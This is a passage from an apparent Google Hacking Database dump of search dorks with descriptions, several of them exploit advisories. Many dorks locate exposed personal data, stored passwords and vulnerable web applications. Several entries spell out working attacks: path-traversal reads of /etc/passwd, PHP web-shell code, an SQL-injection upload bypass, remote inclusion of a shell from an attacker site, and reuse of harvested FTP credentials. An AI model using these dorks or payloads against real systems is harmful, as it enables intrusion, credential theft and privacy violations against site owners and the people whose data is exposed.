HTTP_USER_AGENT<br> vars; when the admin views the logs the javascript will be executed<br> <br> <br> googledork: "powered by ITWorking"<br> <br> rgod<br> mail: retrogod at aliceposta it<br> site: http://rgod.altervista.org<br> <br> original advisory: http://rgod.altervista.org/save_yourself_from_savewebportal34.html[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22powered+by+ITWorking%22+-site%3Aihackstuff.com+-site%3Asecuritytracker.com+-forum+-hacker&btnG=Search[url]] [[dork]"powered by 
ITWorking" -site:ihackstuff.com -site:securitytracker.com -forum -hacker[dork]] [end][1399]] [[start][1403] [[title]intitle:"curriculum vitae" filetype:doc[[title]] [[descr]Hello. 1. It reveals personal data, often private addresses, phone numbers, e-mails, how many children one has:). Full curriculum vitae. I tried many versions of it:<br> inurl:"pl" intitle:"curriculum vitae" filetype:doc<br> inurl:"uk" intitle:"curriculum vitae" filetype:doc<br> inurl:"nl" intitle:"curriculum vitae" filetype:doc, etc. in order to get national results,<br> also<br> intitle:"curriculum vitae" ext:(doc | rtf )<br> However the filetype:doc version gives the most results. <br> 2. You can always do something with someone's phone number, date and place of birth, etc. <br> I placed this string in the forum, but nobody answered me :(. <br> Greetings<br> philY<br> ps. you have something similar in your GHDB, but different.<br> "Click here for the Google search ==> "phone * * *" "address *" "e-mail" intitle:"curriculum vitae"<br> (opens in new window)<br> Added: Thursday, August 19, 2004<br> hits: 24771"[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22curriculum+vitae%22+filetype%3Adoc&btnG=Google+Search[url]] [[dork]intitle:"curriculum vitae" filetype:doc[dork]] [end][1403]] [[start][1405] [[title]"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."[[title]] [[descr]search reveals database errors on vbulletin sites. 
View the page source and you can get information about the sql query executed; this can help in all manner of ways depending on the query.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&c2coff=1&q=%22There+seems+to+have+been+a+problem+with+the%22+%22+Please+try+again+by+clicking+the+Refresh+button+in+your+web+browser.%22&btnG=Search[url]] [[dork]"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."[dork]] [end][1405]] [[start][1409] [[title]inurl:csCreatePro.cgi[[title]] [[descr]Create Pro logon pages.[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3AcsCreatePro.cgi&btnG=Google+Search[url]] [[dork]inurl:csCreatePro.cgi[dork]] [end][1409]] [[start][1410] [[title]"Powered by FUDForum 2.6" -site:fudforum.org -johnny.ihackstuff[[title]] [[descr]FUDforum is prone to a remote arbitrary PHP file upload vulnerability.<br> <br> An attacker can merge an image file with a script file and upload it to an affected server.<br> <br> This issue can facilitate unauthorized remote access.<br> <br> FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.<br> <br> Affected versions:<br> 2.6.15 _ 2.6.14 _ 2.6.13<br> 2.6.12 _ 2.6.10 _ 2.6.9 _ 2.6.8<br> 2.6.7 _ 2.6.5 _ 2.6.4 _ 2.6.3<br> 2.6.2 _ 2.6.1 _ 2.6<br> [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+FUDForum+2.6%22+-site%3Afudforum.org+-johnny.ihackstuff&btnG=Search[url]] [[dork]"Powered by FUDForum 2.6" -site:fudforum.org -johnny.ihackstuff[dork]] [end][1410]] [[start][1411] [[title]intitle:"Looking Glass v20040427" "When verifying an URL check one of those"[[title]] [[descr]Looking Glass v20040427 arbitrary commands execution / cross site scripting. <br> <br> description: Looking Glass is a pretty extensive web based network querying tool for use on php enabled servers. 
<br> <br> site: http://de-neef.net/articles.php?id=2&page=1<br> download page: http://de-neef.net/download.php?file=2<br> <br> Read the full report here: http://rgod.altervista.org/lookingglass.html[descr]] [[url]http://www.google.com/search?q=intitle:%22Looking+Glass+v20040427%22+%22When+verifying+an+URL+check+one+of+those%22+&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"Looking Glass v20040427" "When verifying an URL check one of those" [dork]] [end][1411]] [[start][1414] [[title]contacts ext:wml[[title]] [[descr]Forget Bluetooth Hacking! You'll be amazed at how many people sync their Cell Phones to the same Computers they run some type of Server on. <br> <br> This Query literally gives you access to people's private contact lists that are either on their Smart Phones, or on their Windows CE wireless devices.<br> <br> An attacker could Spoof Emails with the "SIG" details of the person's Phone firmware, or simply collect the cellular numbers for something later on down the road.<br> <br> I even hypothetically came across some private text messages![descr]] [[url]http://www.google.com/search?hl=en&q=contacts+ext%3Awml+&btnG=Google+Search[url]] [[dork]contacts ext:wml [dork]] [end][1414]] [[start][1416] [[title]intitle:"NetCam Live Image" -.edu -.gov -johnny.ihackstuff.com[[title]] [[descr]This is a googledork for StarDot netcams. You can watch these cams and if you have the admin password you can change configurations and other settings. 
They have a default admin name/pass but I haven't taken the time to figure it out.[descr]] [[url]http://www.google.com/search?q=intitle:%22NetCam+Live+Image%22+-.edu+-.gov+-johnny.ihackstuff.com&num=100&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]intitle:"NetCam Live Image" -.edu -.gov -johnny.ihackstuff.com[dork]] [end][1416]] [[start][1417] [[title]intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo -johnny.ihackstuff[[title]] [[descr]iCMS - Content Management System...<br> Create websites without knowing HTML or web programming. [descr]] [[url]http://www.google.com/search?q=intitle:%22Content+Management+System%22+%22user+name%22%7C%22password%22%7C%22admin%22+%22Microsoft+IE+5.5%22+-mambo+-johnny.ihackstuff&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo -johnny.ihackstuff[dork]] [end][1417]] [[start][1418] [[title]phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7)[[title]] [[descr]phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure, remote code execution, cross site scripting<br> <br> software:<br> author site: http://phpldapadmin.sourceforge.net/<br> description: phpLDAPadmin is a web-based LDAP client. It provides easy,<br> anywhere-accessible, multi-language administration for your LDAP server<br> <br> If unpatched and vulnerable, a user can see any file on target system. 
A user can also execute arbitrary php code and system commands, or craft a malicious url to include malicious client side code that will be executed in the security context of the victim's browser.<br> <br> <br> [descr]] [[url]http://www.google.com/search?q=phpLDAPadmin+intitle%3AphpLDAPadmin+filetype%3Aphp+inurl%3Atree.php+%7C+inurl%3Alogin.php+%7C+inurl%3Adonate.php+%280.9.6+%7C+0.9.7%29[url]] [[dork]phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7)[dork]] [end][1418]] [[start][1419] [[title]intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"[[title]] [[descr]Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.<br> <br> Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. 
An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.[descr]] [[url]http://www.google.com/search?q=intitle:guestbook+inurl:guestbook+%22powered+by++Advanced+guestbook+2.*%22+%22Sign+the+Guestbook%22&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"[dork]] [end][1419]] [[start][1420] [[title]intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin[[title]] [[descr]qmail mail admin login pages.<br> <br> There are several vulnerabilities relating to this software<br> <br> [descr]] [[url]http://www.google.com/search?q=intext:%22Master+Account%22++%22Domain+Name%22+%22Password%22+inurl:/cgi-bin/qmailadmin+&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin [dork]] [end][1420]] [[start][1421] [[title]intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org -johnny.ihackstuff[[title]] [[descr]Web-cyradm is a software that glues topnotch mailing technologies together. The focus is on administrating small and large mailing environments.<br> <br> Web-cyradm is used by many different users. At the low end these are home users who are providing mail addresses to their family. At the mid to top end users are SME enterprises, educational and other organizations.<br> <br> The software on which web-cyradm relies is completely free and opensource software. 
So you get the maximum flexibility with the lowest TCO.<br> <br> [descr]] [[url]http://www.google.com/search?q=intitle:%22web-cyradm%22%7C%22by+Luc+de+Louw%22+%22This+is+only+for+authorized+users%22+-tar.gz+-site:web-cyradm.org+-johnny.ihackstuff&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org -johnny.ihackstuff[dork]] [end][1421]] [[start][1422] [[title]"Powered by FUDForum 2.7" -site:fudforum.org -johnny.ihackstuff[[title]] [[descr]FUDforum is prone to a remote arbitrary PHP file upload vulnerability.<br> <br> An attacker can merge an image file with a script file and upload it to an affected server.<br> <br> This issue can facilitate unauthorized remote access.<br> <br> FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.<br> <br> Affected versions:<br> 2.7[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=%22Powered+by+FUDForum+2.7%22+-site%3Afudforum.org+-johnny.ihackstuff&btnG=Search[url]] [[dork]"Powered by FUDForum 2.7" -site:fudforum.org -johnny.ihackstuff[dork]] [end][1422]] [[start][1423] [[title]"You have requested to access the management functions" -.edu[[title]] [[descr]Terracotta web manager admin login portal.[descr]] [[url]http://www.google.com/search?q=%22You+have+requested+to+access+the+management+functions%22++-.edu&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]"You have requested to access the management functions" -.edu[dork]] [end][1423]] [[start][1424] [[title]"Please authenticate yourself to get access to the management interface"[[title]] [[descr]Photo gallery management system login[descr]] [[url]http://www.google.com/search?num=100&q=%22Please+authenticate+yourself+to+get+access+to+the+management+interface%22&btnG=Search[url]] [[dork]"Please authenticate yourself to get access to the management interface"[dork]] [end][1424]] 
[[start][1425] [[title]ext:inc "pwd=" "UID="[[title]] [[descr]Database connection strings including passwords[descr]] [[url]http://www.google.com/search?hl=en&q=ext%3Ainc+%22pwd%3D%22+%22UID%3D%22&btnG=Google+Search[url]] [[dork]ext:inc "pwd=" "UID="[dork]] [end][1425]] [[start][1426] [[title]inurl:chitchat.php "choose graphic"[[title]] [[descr]rgod advises:<br> <br> Cyber-Cats ChitCHat 2.0 permits cross site scripting attacks, lets users launch exploits from it, lets remote users obtain information on target users, and lets them insecurely delete/create files. This search does not find vulnerable versions, only generic.<br> <br> software:<br> site: http://www.cyber-cats.com/php/<br> <br> <br> rgod<br> site: http://rgod.altervista.org<br> mail: retrogo&#100;&#064;&#097;liceposta.it[descr]] [[url]http://www.google.com/search?hl=it&q=inurl%3Achitchat.php+%22choose+graphic%22&btnG=Cerca+con+Google&meta=[url]] [[dork]inurl:chitchat.php "choose graphic"[dork]] [end][1426]] [[start][1427] [[title]"Calendar programming by AppIdeas.com" filetype:php[[title]] [[descr]phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting. This search does not narrow to vulnerable versions.<br> <br> software:<br> site: http://open.appideas.com<br> download: http://open.appideas.com/Calendar/<br> <br> original advisory: http://rgod.altervista.org/phpccal.html<br> [descr]] [[url]http://www.google.com/search?hl=it&q=%22Calendar+programming+by+AppIdeas.com%22+filetype%3Aphp&btnG=Cerca+con+Google&meta=[url]] [[dork]"Calendar programming by AppIdeas.com" filetype:php[dork]] [end][1427]] [[start][1428] [[title]"Powered by MD-Pro" | "made with MD-Pro"[[title]] [[descr]MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution<br> / cross site scripting / path disclosure.<br> 
This search does not find vulnerable versions.<br> <br> software:<br> site: http://www.maxdev.com/<br> description: http://www.maxdev.com/AboutMD.phtml<br> <br> <br> original advisory: http://rgod.altervista.org/maxdev1073.html<br> <br> [descr]] [[url]http://www.google.com/search?q=%22Powered+by+MD-Pro%22+%7C+%22made+with+MD-Pro%22&start=0&start=0[url]] [[dork]"Powered by MD-Pro" | "made with MD-Pro"[dork]] [end][1428]] [[start][1429] [[title]"Software PBLang" 4.65 filetype:php[[title]] [[descr]my advisory:<br> <br> [quote]<br> PBLang 4.65 (possibly prior versions) remote code execution / administrative<br> credentials disclosure / system information disclosure / cross site scripting /<br> path disclosure<br> <br> software:<br> <br> description: PBLang is a powerful flatfile Bulletin Board System. It combines<br> many features of a professional board, but does not even require SQL support. It<br> is completely based on text files.<br> <br> site: http://pblang.drmartinus.de/<br> download: https://sourceforge.net/project/showfiles.php?group_id=62953<br> <br> 1) system disclosure:<br> <br> you can traverse directories and see any file (if not .php or .php3 etc.) 
and<br> include any file on target system using '../' chars and null byte (%00), example:<br> <br> http://[target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd%00<br> <br> vulnerable code in setcookie.php:<br> <br> ...<br> 16 $usrname=$HTTP_GET_VARS['u'];<br> 17 @include($dbpath.'/'.$usrname.'temp');<br> ...<br> <br> 2) remote code execution:<br> <br> board stores data in files, when you register a [username] file without extension<br> is created in /db/members directory, inside we have php code executed when you<br> login, so in location field type:<br> <br> madrid"; system($HTTP_POST_VARS[cmd]); echo "<br> <br> in /db/members/[username] file we have<br> <br> ...<br> $userlocation="madrid"; system($HTTP_GET_VARS[cmd]); echo "";<br> ...<br> <br> no way to access the script directly, /db/members is .htaccess protected<br> and extra lines are deleted from files after you login, so you should make<br> all in a POST request and re-register<br> <br> this is my proof of concept exploit, to include [username] file I make a GET request of setcookie.php?u=[username]%00&cmd=[command] but you can call username file through some other inclusion surely when you surf the forum:<br> <br> http://rgod.altervista.org/pblang465.html <br> <br> 3)admin/user credentials disclosure:<br> <br> you can see password hash of any user or admin sending the command:<br> <br> cat ./db/members/[username]<br> <br> <br> 4) cross site scripting:<br> <br> register and in location field type:<br> <br> madrid"; echo "alert(document.cookie)<br> <br> then check this url:<br> <br> http://[target]/[path]/setcookie.php?u=[username]%00<br> <br> <br> 5) path disclosure:<br> <br> http://[target]/[path]/setcookie.php?u=%00<br> <br> <br> googledork: "Software PBLang" filetype:php<br> <br> rgod<br> site: http://rgod.altervista.org<br> mail: retrogo&#100;&#064;&#097;liceposta.it<br> original advisory: http://rgod.altervista.org/pblang465.html<br> [/quote]<br> <br> [descr]] 
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Software+PBLang%22+4.65+filetype%3Aphp[url]] [[dork]"Software PBLang" 4.65 filetype:php[dork]] [end][1429]] [[start][1430] [[title]"Powered by and copyright class-1" 0.24.4[[title]] [[descr]class-1 Forum Software v 0.24.4 Remote code execution<br> <br> software: <br> site: http://www.class1web.co.uk/software<br> <br> description: <br> <br> class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributed<br> under the GNU General Public License which means that its source is freely-distributed<br> and available to the general public. <br> <br> vulnerability: the way the forum checks attachment extensions...<br> look at the vulnerable code in viewforum.php, lines 256-272.<br> <br> <br> nothing seems so strange, but... what happens if you try to upload a file<br> with this name? :<br> <br> shell.php.' or 'a' ='a<br> <br> ;)<br> <br> [1] SQL INJECTION!<br> <br> The query and other queries like this become:<br> <br> SELECT * FROM [extensions table name] WHERE extension='' or 'a' ='a' AND file_type='Image'<br> <br> you have bypassed the check... 
now an executable file is uploaded, because for Apache, both<br> on Windows and Linux, a file with that name is an executable php file...<br> <br> you can download a poc file from my site, at url:<br> <br> http://rgod.altervista.org/shell.zip<br> <br> inside we have:<br> <br> <?php error_reporting(0); system($HTTP_GET_VARS[command]); ?><br> <br> you can test manually: unzip the file, register, login, post this file as an attachment, then<br> go to this url to see the directory where the attachment has been uploaded:<br> <br> http://[target]/[path]/viewattach.php<br> <br> you will be redirected to:<br> <br> http://[target]/[path]/[upload_dir]/<br> <br> then launch commands:<br> <br> http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20/etc/passwd<br> <br> to see /etc/passwd file<br> <br> http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20./../db_config.inc<br> <br> to see database username and password<br> and so on...<br> <br> you can see my poc exploit at this url:<br> <br> http://www.rgod.altervista.org/class1.html<br> <br> googledork: "Powered by and copyright class-1"<br> <br> rgod<br> site: http://rgod.altervista.org<br> mail: retrogod [at] aliceposta . 
it<br> <br> <br> [descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Powered+by+and+copyright+class-1%22++0.24.4&num=50[url]] [[dork]"Powered by and copyright class-1" 0.24.4[dork]] [end][1430]] [[start][1431] [[title]"Powered by Xcomic"[[title]] [[descr]"Powered by xcomic"<br> <br> this is a recent exploit, you can retrieve any file on target system<br> by using "../" chars and null byte (%00), example:<br> <br> http://target/path_to_xcomic/initialize.php?xcomicRootPath=../../../../etc/passwd%00<br> <br> or launch commands:<br> <br> http://target/path_to_xcomic/initialize.php?xcomicRootPath=http://[evil_site]/cmd.gif?command=ls%20-la%00<br> <br> where cmd.gif is a file like this:<br> <br> <?php error_reporting(0); system($_GET[command]); ?><br> <br> I have read an advisory copy here: http://forum.ccteam.ru/archive/index.php/t-57.html[descr]] [[url]http://www.google.com/search?hl=it&q=%22Powered+by+Xcomic%22+&btnG=Cerca+con+Google&meta=[url]] [[dork]"Powered by Xcomic" [dork]] [end][1431]] [[start][1432] [[title]rdbqds -site:.edu -site:.mil -site:.gov[[title]] [[descr]Caesar encryption is a rather simple encryption. You simply shift letters up or down across the entire length of the message... In the url I did this with the word "secret" which equals rdbqds.. (1 char shift).<br> <br> It appears that protected PDF documents use this very encryption to protect its documents. At least one version of adobe acrobat did. 
<br> <br> A big thank you to Golfo for the links he provided in the forum to assist.<br> <br> http://www.math.cankaya.edu.tr/~a.kabarcik/decrypt.html <br> http://www.math.cankaya.edu.tr/~a.kabarcik/encrypt.html<br> <br> [descr]] [[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=rdbqds+-site%3A.edu+-site%3A.mil+-site%3A.gov[url]] [[dork]rdbqds -site:.edu -site:.mil -site:.gov[dork]] [end][1432]] [[start][1433] [[title]"Warning:" "Cannot execute a blank command in"[[title]] [[descr]"Warning: passthru(): Cannot execute a blank command in" <br> "Warning: system(): Cannot execute a blank command in" <br> "Warning: exec(): Cannot execute a blank command in" <br> <br> generally: <br> <br> "Warning:" "Cannot execute a blank command in" <br> <br> this is a php error message; essentially it shows links to hacked pages <br> where someone left a backdoor and the page has error_reporting not set to 0... <br> you can execute shell commands simply by appending a var, guessing the variable name, usually <br> 'cmd' or 'command' or something else, example: <br> <br> http://[target]/[path]/somescript.php?cmd=cat%20/etc/passwd[descr]] [[url]http://www.google.com/search?hl=it&q=%22Warning%3A%22+%22Cannot+execute+a+blank+command+in%22&meta=[url]] [[dork]"Warning:" "Cannot execute a blank command in"[dork]] [end][1433]] [[start][1434] [[title]"Mail-it Now!" intitle:"Contact form" | inurl:contact.php[[title]] [[descr]Mail-it Now! 
1.5 (possibly prior versions) contact.php remote code execution<br> <br> site: http://www.skyminds.net/source/<br> description: a mail form script<br> <br> <br> vulnerability: insecure file creation -> remote code execution<br> <br> when you post an attachment and upload it to the server (usually to "./upload/" dir )<br> the script renames the file in this way:<br> [time() function result] + [-] + [filename that user chooses]<br> spaces are simply replaced with "_" chars.<br> So a user can post an executable attachment, calculate the time() result locally<br> then, if attachment is a file like this:<br> <br> <?php error_reporting(0); system($HTTP_GET_VARS[command]); ?><br> <br> can launch commands on target system, example:<br> <br> http://[target]/[path]/[time() result]-[filename.php]?command=cat%20/etc/passwd<br> <br> you can find my poc code at this url: http://rgod.altervista.org/mailitnow.html<br> <br> [descr]] [[url]http://www.google.com/search?hl=en&q=%22Mail-it+Now%21%22+intitle%3A%22Contact+form%22+%7C+inurl%3Acontact.php[url]] [[dork]"Mail-it Now!" intitle:"Contact form" | inurl:contact.php[dork]] [end][1434]] [[start][1435] [[title]"maxwebportal" inurl:"default" "snitz forums" +"homepage" -intitle:maxwebportal[[title]] [[descr]Several vulnerabilities relating to this.<br> <br> MaxWebPortal is a web portal and online community system which includes features such as web-based administration, poll, private/public events calendar, user customizable color themes, classifieds, user control panel, online pager, link, file, article, picture managers and much more. 
User interface allows members to add news, content, write reviews and share information among other registered users.<br> <br> h**p://www.maxwebportal.com/[descr]] [[url]http://www.google.com/search?hl=en&q=%22maxwebportal%22+inurl%3A%22default%22+%22snitz+forums%22+%2B%22homepage%22+-intitle%3Amaxwebportal[url]] [[dork]"maxwebportal" inurl:"default" "snitz forums" +"homepage" -intitle:maxwebportal[dork]] [end][1435]] [[start][1436] [[title]"Powered by AzDg" (2.1.3 | 2.1.2 | 2.1.1)[[title]] [[descr]AzDGDatingLite V 2.1.3 (possibly prior versions) remote code execution <br> <br> software: <br> site: http://www.azdg.com/ <br> download page: http://www.azdg.com/scripts.php?l=english <br> description:" AzDGDatingLite is a Free dating script working on PHP and MySQL. <br> Multilanguage, Multitemplate, quick/simple search, feedback with webmaster, Admin maillist, <br> Very customizable " etc. <br> <br> vulnerability: <br> <br> look at the vulnerable code in ./include/security.inc.php at lines ~80-90 <br> <br> ... <br> else <br> { <br> if (isset($l) && file_exists(C_PATH.'/languages/'.$l.'/'.$l.'.php') && $l != '') <br> { <br> include_once C_PATH.'/languages/'.$l.'/'.$l.'.php'; <br> include_once C_PATH.'/languages/'.$l.'/'.$l.'_.php'; <br> } <br> ... <br> <br> you can include arbitrary files on the server using "../" and null byte (%00) (to truncate path to <br> the filename you choose), example: <br> <br> http://[target]/[path]/azdg//include/security.inc.php?l=../../../../../../../[filename.ext]%00 <br> <br> at the beginning of the script we have: <br> <br> <br> @ob_start(); <br> <br> look at the php ob_start man page : <br> <br> "This function will turn output buffering on. While output buffering is active no output is <br> sent from the script (other than headers), instead the output is stored in an internal buffer." 
<br> <br> However, this is not a secure way to protect a script: <br> the buffer is never shown, so you cannot see arbitrary files from the target machine this time ... but <br> you can execute arbitrary commands and afterwards see any file :) : <br> <br> when you register to azdg you can upload photos, so you can upload and include a gif or jpeg file like this: <br> <br> <?php error_reporting(0); system($HTTP_GET_VARS[cmd].' > temp.txt'); ?> <br> <br> usually photos are uploaded to ./members/uploads/[subdir]/[newfilename].[ext] <br> azdg calculates [subdir] & [newfilename] using date(), time() and rand() functions <br> you cannot calculate these, but you can retrieve the filename from azdg pages when the file <br> is shown on screen (!), so you can do this: <br> <br> http://[target]/[path]/azdg//include/security.inc.php?l=../../../members/uploads/[subdir]/[filename.ext]%00&cmd=cat%20/etc/passwd <br> <br> the output will be redirected to ./include/temp.txt <br> <br> so you make a GET request of this file and you have /etc/passwd file <br> <br> you can find my poc exploit at this url:<br> http://rgod.altervista.org/azdg.html<br> [descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Powered+by+AzDg%22+%282.1.3+%7C+2.1.2+%7C+2.1.1%29&btnG=Search[url]] [[dork]"Powered by AzDg" (2.1.3 | 2.1.2 | 2.1.1)[dork]] [end][1436]] [[start][1437] [[title]intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo -johnny.ihackstuff[[title]] [[descr]iCMS - Content Management System...<br> Create dynamic interactive websites in minutes without knowing HTML or web programming. iCMS is a perfect balance of ease of use, flexibility, and power. 
If you are a Web Developer, you can dramatically decrease your Website development time, decrease your costs and deliver a product that will yield higher profits with less maintenance required!<br> <br> Don't think there are any vulns attached to this<br> <br> [descr]] [[url]http://www.google.com/search?q=intitle:%22Content+Management+System%22+%22user+name%22%7C%22password%22%7C%22admin%22+%22Microsoft+IE+5.5%22+-mambo+-johnny.ihackstuff&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo -johnny.ihackstuff[dork]] [end][1437]] [[start][1438] [[title]"Powered by: Land Down Under 800" | "Powered by: Land Down Under 801" - www.neocrome.net[[title]] [[descr]Land Down Under is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.<br> <br> Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. 
An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.<br> <br> http://secunia.com/advisories/16878/[descr]] [[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by%3A+Land+Down+Under+800%22+%7C++%22Powered+by%3A+Land+Down+Under+801%22+-+www.neocrome.net&btnG=Search[url]] [[dork]"Powered by: Land Down Under 800" | "Powered by: Land Down Under 801" - www.neocrome.net[dork]] [end][1438]] [[start][1439] [[title]intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin[[title]] [[descr]There seems to be several vulns for qmail.[descr]] [[url]http://www.google.com/search?q=intext:%22Master+Account%22++%22Domain+Name%22+%22Password%22+inurl:/cgi-bin/qmailadmin+&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin [dork]] [end][1439]] [[start][1440] [[title]"powered by Gallery v" "[slideshow]"|"images" inurl:gallery[[title]] [[descr]There is a script injection vuln for all versions.<br> <br> http://www.securityfocus.com/bid/14668[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22powered+by+Gallery+v%22+%22%5Bslideshow%5D%22%7C%22images%22+inurl%3Agallery&btnG=Search[url]] [[dork]"powered by Gallery v" "[slideshow]"|"images" inurl:gallery[dork]] [end][1440]] [[start][1441] [[title]intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"[[title]] [[descr]Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.<br> <br> Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. 
An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.<br> <br> http://secunia.com/product/4356/<br> http://www.packetalarm.com/sec_notices/index.php?id=2209&delimit=1#detail[descr]] [[url]http://www.google.com/search?q=intitle:guestbook+inurl:guestbook+%22powered+by++Advanced+guestbook+2.*%22+%22Sign+the+Guestbook%22&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"[dork]] [end][1441]] [[start][1442] [[title]intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" -johnny.ihackstuff[[title]] [[descr]phpMyBackup is a MySQL backup tool, with features like copying backups to a different server using FTP.[descr]] [[url]http://www.google.com/search?q=intitle:%22Backup-Management+(phpMyBackup+v.0.4+beta+*+)%22+-johnny.ihackstuff&num=100&filter=0[url]] [[dork]intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" -johnny.ihackstuff[dork]] [end][1442]] [[start][1443] [[title]"Powered by Monster Top List" MTL numrange:200-[[title]] [[descr]2 Step dork - Change url to add filename "admin.php" (just remove index.php&stuff=1&me=2 if you have to) for the admin login.<br> <br> This search finds more pages rather than focusing on the admin login page itself, thus the 2 step dork is more effective.<br> <br> [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Monster+Top+List%22+MTL+numrange%3A200-&btnG=Search[url]] [[dork]"Powered by Monster Top List" MTL numrange:200-[dork]] [end][1443]] [[start][1444] [[title]"login prompt" inurl:GM.cgi[[title]] [[descr]GreyMatter is prone to an HTML injection vulnerability. 
This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22login+prompt%22+inurl%3AGM.cgi&btnG=Search[url]] [[dork]"login prompt" inurl:GM.cgi[dork]] [end][1444]] [[start][1445] [[title]"e107.org 2002/2003" inurl:forum_post.php?nt[[title]] [[descr]e107 is prone to an input validation vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.<br> <br> Successful exploitation of this issue will permit an attacker to create arbitrary forum message posts.<br> <br> http://www.securityfocus.com/bid/14699[descr]] [[url]http://www.google.com/search?q=%22e107.org+2002/2003%22+inurl:forum_post.php%3Fnt&hl=en&lr=&c2coff=1&start=0&sa=N[url]] [[dork]"e107.org 2002/2003" inurl:forum_post.php?nt[dork]] [end][1445]] [[start][1446] [[title]filetype:dat inurl:Sites.dat[[title]] [[descr]If you want to find out FTP passwords from FlashFXP Client, just type this query in google and you'll find files called Sites.dat which contain ftp sites, usernames and passwords. If you want to use it, just install FlashFXP and copy whole section to your sites.dat file (file is in your flashFXP directory).<br> [descr]] [[url]http://www.google.com/search?q=filetype:dat+inurl:Sites.dat[url]] [[dork]filetype:dat inurl:Sites.dat[dork]] [end][1446]] [[start][1447] [[title]intext:"enable password 7"[[title]] [[descr]Some people are that stupid to keep their Cisco routers config files on site. You can easily find out configs and passwords along with IP addresses of these devices. 
